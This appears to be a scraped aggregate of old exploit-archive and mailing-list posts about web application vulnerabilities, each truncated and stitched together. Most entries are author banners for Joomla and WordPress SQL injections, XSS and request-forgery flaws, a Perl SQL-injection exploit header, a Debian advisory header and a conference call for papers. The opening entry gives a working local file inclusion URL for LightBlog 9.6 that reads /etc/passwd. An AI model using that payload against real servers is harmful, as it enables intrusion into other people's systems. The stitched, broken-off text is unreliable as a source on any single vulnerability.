lightblog 9.6 local file inclusion vulnerability
download http://www.publicwarehouse.co.uk/php_scripts/lightblog.php
author muuratsalo
contact muuratsalo[at]gmail.com
exploit
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00
###
#
# joomla SQL Injection(com_filebase)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : [EMAIL PROTECTED]
###
#
# joomla SQL Injection(com_galeria)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : [EMAIL
###
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities by NBBN
###
[b]
1) Create Webmaster (admin) XSRF Vulnerability[/b]
htmlhead/headbody
Crafty Syntax Live Help is an open source help desk system built
mainly for small-mid sized companies. The software includes an xss
vulnerability on lostsheep.php module.
Versions affected: 2.4.13 - 2.4.14
--
Ozgur Ozdemircili
CCNA, HIPAA, OPSEC,
Open Source Security Systems
###
#
# joomla SQL Injection(com_profile)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : [EMAIL PROTECTED]
###
#
# joomla SQL Injection(com_detail)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : [EMAIL PROTECTED]
#
#
#
# Wordpress Plugin (wp-content/recipe) SQL Injection
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
#
# WordPress forumaction(PAGE_İD)(user)SQL Injection
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
###
#
# WordPress album PHOTO SQL Injection
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : [EMAIL PROTECTED]
RUXCON 2008 CALL FOR PAPERS
RuxCon would like to announce the call for papers for the fifth annual
RuxCon conference.
This year the conference will commence during the 29th/30th November.
As with previous years, RuxCon will be held at the University of
Technology, Sydney, Australia.
The
#
#
# WordPress SQL Injection(wp-content-simple-forum)
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
###
#
# joomla SQL Injection(com_jooget)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : [EMAIL PROTECTED]
#!/usr/bin/perl
# Simple CMS = 1.0.3 (?area=) Remote SQL Injection Exploit
# Code by JosS | Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team / Sys - Project
# http://www.spanish-hackers.com
# special thanks to ka0x
print
==
ATutor = 1.5.5 Cross Site Scripting
==
Author: L4teral l4teral [4t] gmail com
Impact: Cross Site Scripting
Status: patch available
###
#
# joomla SQL Injection(com_ricette)
#
###
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : [EMAIL
==
ProjectPier = 0.80 Cross Site Scripting and Request Forgery
==
Author: L4teral l4teral [4t] gmail com
Impact: Cross Site Scripting
#
#
# joomla SQL Injection (cat)(com_downloads)
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.milw0rm.com/author/1334
#
#
#
#
# Wordpress Plugin (wp-people) SQL Injection
#
#
#
# AUTHOR : [EMAIL PROTECTED]
#
# HOME : http://www.hackturkiye.com/
#
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1495-2 [EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
February 17, 2008
## ##
## ##
## ##
###CoRPITX
###
## ##
## ##
## ##
### Turkey
# #
For information on this threat, please visit
http://www.etomite.com/forums/index.php?showtopic=7647
The information posted by the finder is inaccurate.
After researching this threat it appears that this is not a direct issue with
Etomite itself but, rather, an exploit which server security lets through... I
have tested several different scripts on several servers and have found this to
be the case...
The variable is actually